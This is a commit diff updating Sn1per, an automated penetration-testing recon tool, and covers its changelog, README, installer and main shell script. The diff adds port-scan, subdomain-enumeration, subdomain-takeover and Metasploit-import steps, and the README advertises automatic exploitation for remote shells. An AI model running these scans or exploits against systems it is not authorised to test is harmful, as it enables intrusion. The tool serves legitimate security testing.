Sn1per by 1N3@CrowdShield

2016-11-30 10:29:40 -05:00 · 2016-11-23 12:34:55 -05:00 · 2016-10-27 11:22:10 -04:00 · 2016-10-17 13:32:45 -04:00 · 2016-10-14 16:20:42 -04:00
4 changed files with 279 additions and 67 deletions
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,4 +1,22 @@
 ## CHANGELOG:
 * v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
 * v2.2 - Added Sn1per workspaces to loot directory
 * v2.1d - Added crt.sh sub-domain check
 * v2.1d - Removed blank screenshots from loot directory
 * v2.1c - Fixed issue with install.sh install directories
 * v2.1b - Added automatic Metasploit NMap xml imports for loot directory
 * v2.1b - Removed Zenmap
 * v2.1a - Separated Arachni reports for port 80/443/tcp
 * v2.1a - Fixed NMap full port scan options
 * v2.1 - Added Arachni with auto HTML web reporting (web mode only)
 * v2.1 - Added full NMap detailed port scans
 * v2.1 - Added port 4443/tcp checks
 * v2.1 - Added META tag scans for web apps
 * v2.1 - Removed Uniscan from web mode
 * v2.1 - Removed SQLMap from web mode
 * v2.0b - Added help option --help
 * v2.0a - Fixed issue with ssh-audit
 * v2.0a - Fixed issue with 'discover' mode
 * v2.0 - Updated sub-domain takeover list
 * v2.0 - Improved scan performance for stealth, airstrike and discover modes
 * v2.0 - Removed jexboss due to clear screen issue with output
@@ -106,4 +124,4 @@
 * v1.4 - Removed debug output from goohak from displaying on console
 ## FUTURE:
-* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)
+* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)
--- a/README.md
+++ b/README.md
@@ -19,6 +19,8 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
 * Automatically exploit remote hosts to gain remote shell access
 * Performs high level enumeration of multiple hosts
 * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
 * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
 * Create individual workspaces to store all scan output
 ## KALI LINUX INSTALL:
 ```
@@ -61,7 +63,7 @@ sniper loot
 * **NOBRUTE:** Launches a full scan against a target host/domain without brute forcing services.
 * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
 * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. 
-* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type 'sniper loot'.
+* **LOOT:** Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.
 ## SAMPLE REPORT:
 https://gist.github.com/1N3/8214ec2da2c91691bcbc
--- a/install.sh
+++ b/install.sh
@@ -19,18 +19,25 @@ echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 echo ""
 INSTALL_DIR=/usr/share/sniper
 LOOT_DIR=/usr/share/sniper/loot
 PLUGINS_DIR=/usr/share/sniper/plugins
 echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
 read answer 
 mkdir -p $INSTALL_DIR 2> /dev/null
 mkdir -p $LOOT_DIR 2> /dev/null
 mkdir $LOOT_DIR/domains 2> /dev/null
 mkdir $LOOT_DIR/screenshots 2> /dev/null
 mkdir $LOOT_DIR/nmap 2> /dev/null
 mkdir $LOOT_DIR/reports 2> /dev/null
 mkdir $LOOT_DIR/output 2> /dev/null
 cp -Rf $PWD/* $INSTALL_DIR 
 cd $INSTALL_DIR
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
 apt-get install ruby rubygems python dos2unix zenmap sslyze uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
-pip install dnspython colorama tldextract urllib3 ipaddress
+pip install dnspython colorama tldextract urllib3 ipaddress arachni
 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
 gem install rake
@@ -38,7 +45,7 @@ gem install ruby-nmap net-http-persistent mechanize text-table
 echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
 rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
-mkdir /usr/share/sniper/plugins/
+mkdir $PLUGINS_DIR
 cd $PLUGINS_DIR
 echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
--- a/311
+++ b/311
@@ -1,5 +1,5 @@
 #!/bin/bash
-# + -- --=[Sn1per v2.0 by 1N3 
+# + -- --=[Sn1per v2.2 by 1N3 
 # + -- --=[http://crowdshield.com
 #
 # Sn1per - Automated Pentest Recon Tool
@@ -20,15 +20,15 @@
 # ./install.sh - Installs all dependencies. Best run from Kali Linux. 
 #
 # USAGE:
-# ./sniper <target>
+# sniper <target>
-# ./sniper <target> <report>
+# sniper <target> <report>
-# ./sniper <CIDR> discover <report>
+# sniper <CIDR> discover <report>
-# ./sniper <target> stealth <report>
+# sniper <target> stealth <report>
-# ./sniper <target> port <portnum>
+# sniper <target> port <portnum>
-# ./sniper <target> web <report>
+# sniper <target> web <report>
-# ./sniper <targets.txt> airstrike <report>
+# sniper <targets.txt> airstrike <report>
-# ./sniper <targets.txt> nuke <report>
+# sniper <targets.txt> nuke <report>
-# ./sniper loot
+# sniper loot
 #
 TARGET="$1"
@@ -53,12 +53,115 @@ OKORANGE='\033[93m'
 RESET='\e[0m'
 REGEX='^[0-9]+$'
 cd $INSTALL_DIR
 # ENABLE/DISABLE AUTOMATIC BRUTE FORCE
 # DEFAULT IS "1" (ENABLED)
 AUTOBRUTE="1"
 # ENABLE/DISABLE FULL DETAILED NMAP SCAN
 # DEFAULT IS "1" (ENABLED)
 FULLNMAPSCAN="1"
 cd $INSTALL_DIR
 function loot {
 	echo -e "$OKRED                ____               $RESET"
 	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 	echo -e "$OKRED               /_/                 $RESET"
 	echo ""
 	echo -e "$OKORANGE + -- --=[Current workspaces..."
 	cd $LOOT_DIR
 	ls -lh $LOOT_DIR/workspace/
 	echo -e "$OKORANGE + -- --=[Enter a name for the workspace:"
 	read WORKSPACE
 	mkdir -p $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null
 	echo -e "$OKORANGE + -- --=[Generating reports..."
 	for a in `ls sniper-*.txt 2>/dev/null`; 
 	do 
 		echo "$a" > $LOOT_DIR/reports/$a
 		sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
 		mv $a $LOOT_DIR/output/
 	done
 	echo -e "$OKORANGE + -- --=[Removing blank web screenshots..."
 	find /usr/share/sniper/loot/screenshots/ -size -10k -exec rm -f {} \; 2> /dev/null
 	rm -f $LOOT_DIR/.fuse_* 2> /dev/null
 	echo -e "$OKORANGE + -- --=[Starting Metasploit service..."
 	/etc/init.d/metasploit start 2> /dev/null
 	echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit..."
 	msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;"
 	echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE..."
 	cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/screenshots/ 2> /dev/null
 	cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null
 	cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/domains/ 2> /dev/null
 	cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/output/ 2> /dev/null
 	cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/reports/ 2> /dev/null
 	cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/imports/ 2> /dev/null
 	cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/notes/ 2> /dev/null
 	cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/web/ 2> /dev/null
 	rm -Rf $LOOT_DIR/screenshots/ 2> /dev/null
 	rm -Rf $LOOT_DIR/nmap/ 2> /dev/null
 	rm -Rf $LOOT_DIR/domains/ 2> /dev/null
 	rm -Rf $LOOT_DIR/output/ 2> /dev/null
 	rm -Rf $LOOT_DIR/reports/ 2> /dev/null
 	rm -Rf $LOOT_DIR/imports/ 2> /dev/null
 	rm -Rf $LOOT_DIR/notes/ 2> /dev/null
 	rm -Rf $LOOT_DIR/web/ 2> /dev/null
 	mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
 	mkdir $LOOT_DIR/nmap -p 2> /dev/null
 	mkdir $LOOT_DIR/domains -p 2> /dev/null
 	mkdir $LOOT_DIR/output -p 2> /dev/null
 	mkdir $LOOT_DIR/reports -p 2> /dev/null
 	mkdir $LOOT_DIR/imports -p 2> /dev/null
 	mkdir $LOOT_DIR/notes -p 2> /dev/null
 	mkdir $LOOT_DIR/web -p 2> /dev/null
 	echo -e "$OKORANGE + -- --=[Opening workspace directory..."
 	iceweasel $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null &
 	echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI..."
 	iceweasel http://localhost:3001/login 2> /dev/null &
 	echo -e "$OKORANGE + -- --=[Launching Zenmap..."
 	zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null &
 	echo -e "$OKORANGE + -- --=[Done!"
 }
 function help {
 	echo -e "$OKRED                ____               $RESET"
 	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
 	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
 	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 	echo -e "$OKRED               /_/                 $RESET"
 	echo ""
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 	echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET"
 	echo -e "$OKORANGE + -- --=[Usage:"
 	echo ""
 	echo ' [*] sniper <target> <report>'
 	echo ' [*] sniper <target> stealth <report>'
 	echo ' [*] sniper <CIDR> discover'
 	echo ' [*] sniper <target> port <portnum> '
 	echo ' [*] sniper <target> web <report>'
 	echo ' [*] sniper <target> nobrute <report>'
 	echo ' [*] sniper <targets.txt> airstrike <report>'
 	echo ' [*] sniper <targets.txt> nuke <report>'
 	echo ' [*] sniper loot'
 	echo ""
 	echo ' + -- --=[Modes:'
 	echo ''
   echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.'
   echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking'
   echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.'
   echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.'
   echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.'
   echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.'
   echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.'
   echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.'
   echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET"
   echo ""
   echo ""
 }
 if [ -z $TARGET ]; then
 	echo -e "$OKRED                ____               $RESET"
 	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
@@ -68,35 +171,16 @@ if [ -z $TARGET ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e ""
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
-	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3$RESET"
+	echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET"
-	echo -e "$OKORANGE + -- --=[Usage: sn1per <target>$RESET"
+	echo -e "$OKORANGE + -- --=[Usage: sniper <target>$RESET"
 	echo ""
 	exit
 fi
-function loot {
+if [[ $TARGET = "--help" ]]; then
-	echo -e "$OKRED                ____               $RESET"
+	help
-	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+	exit
-	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+fi
 	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 	echo -e "$OKRED               /_/                 $RESET"
 	echo ""
 	cd $LOOT_DIR
 	echo -e "$OKORANGE + -- --=[Sorting loot directory ($LOOT_DIR)"
 	echo -e "$OKORANGE + -- --=[Generating reports..."
 	for a in `ls sniper-*.txt 2>/dev/null`; 
 	do 
 		echo "$a" > $LOOT_DIR/reports/$a
 		sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
 		mv $a $LOOT_DIR/output/
 	done
 	rm -f $LOOT_DIR/.fuse_* 2> /dev/null
 	echo -e "$OKORANGE + -- --=[Opening loot directory..."
 	iceweasel $LOOT_DIR &> /dev/null &
 	zenmap -f $LOOT_DIR/nmap/ &> /dev/null &
 	echo -e "$OKORANGE + -- --=[Done!"
 }
 if [[ ${TARGET:0:1} =~ $REGEX ]]; 
 	then 
@@ -105,8 +189,6 @@ else
 	SCAN_TYPE="DOMAIN"
 fi
 #clear
 if [ "$MODE" = "report" ]; then
 	sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
 	exit
@@ -138,7 +220,7 @@ if [ "$MODE" = "discover" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
 	arp -a -n
 	echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
-	unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
+	unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
 	echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
 	cat $LOOT_DIR/domains/sniper-ips.txt
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
@@ -176,7 +258,7 @@ if [ "$MODE" = "stealth" ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e "$RESET"
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
+	echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
 	echo -e "$OKRED " 	
 	echo -e "$OKRED     ./\."
 	echo -e "$OKRED   ./    '\."
@@ -220,18 +302,31 @@ if [ "$MODE" = "stealth" ]; then
 		echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 		dig -x $TARGET
 		dnsenum $TARGET
-		mv -f *_ips.txt $LOOT_DIR/ 2>/dev/null
+		mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 		echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-		python Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+		python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 		dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 		echo ""
 		echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
 		echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
 		echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
 		echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
 		echo -e "$OKBLUE"
 		curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
 		echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
 		cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null	
 		cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null	
 		sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
 		rm -f /tmp/curl.out 2> /dev/null	
 		echo -e "$RESET"
 		echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
 		for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done;
 		echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-		python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
+		python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
 	fi
 	echo ""
 	echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
-	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
 	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
@@ -273,7 +368,21 @@ if [ "$MODE" = "stealth" ]; then
 	fi
 	echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
-	loot
+	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	echo -e ""
 	rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
 	exit
 fi
@@ -291,7 +400,7 @@ if [ "$MODE" = "airstrike" ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e "$RESET"
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
+	echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
 	for a in `cat $TARGET`;
 	do
@@ -342,16 +451,29 @@ if [ "$MODE" = "airstrike" ]; then
 			dnsenum $a
 			mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 			echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-			python Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
+			python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
 			dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
 			echo ""
 			echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
 			echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
 			echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
 			echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
 			echo -e "$OKBLUE"
 			curl -s https://crt.sh/?q=%25.$a > /tmp/curl.out && cat /tmp/curl.out | grep $a | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$a-crt.txt && cat $LOOT_DIR/domains/domains-$a-crt.txt
 			echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
 			cat $LOOT_DIR/domains/domains-$a-crt.txt > /tmp/curl.out 2> /dev/null	
 			cat $LOOT_DIR/domains/domains-$a.txt >> /tmp/curl.out 2> /dev/null	
 			sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$a-full.txt
 			rm -f /tmp/curl.out 2> /dev/null	
 			echo -e "$RESET"
 			echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
 			for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
 			echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-			python SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
+			python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
 		fi
 		echo ""
 		echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
-		nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml
+		nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml
 		port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
 		port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
@@ -391,7 +513,6 @@ if [ "$MODE" = "airstrike" ]; then
 		fi
 		echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
 		loot
 		echo -e ""
 		echo -e ""
 		echo -e ""
@@ -467,7 +588,7 @@ echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 echo -e "$OKRED               /_/                 $RESET"
 echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
+echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
 echo -e "$RESET"
 echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
 nslookup $TARGET
@@ -483,14 +604,27 @@ then
 	echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 	dig -x $TARGET
 	dnsenum $TARGET
-	mv -f *_ips.txt $LOOT_DIR/ 2>/dev/null
+	mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 	echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-	python Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+	python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 	dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 	echo ""
 	echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
 	echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
 	echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
 	echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
 	echo -e "$OKBLUE"
 	curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
 	echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
 	cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null	
 	cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null	
 	sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
 	rm -f /tmp/curl.out 2> /dev/null	
 	echo -e "$RESET"
 	echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
 	for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
 	echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-	python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
+	python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
 fi
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET"
@@ -498,7 +632,7 @@ ping -c 1 $TARGET
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
 if [ -z "$OPT1" ]; then
-	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
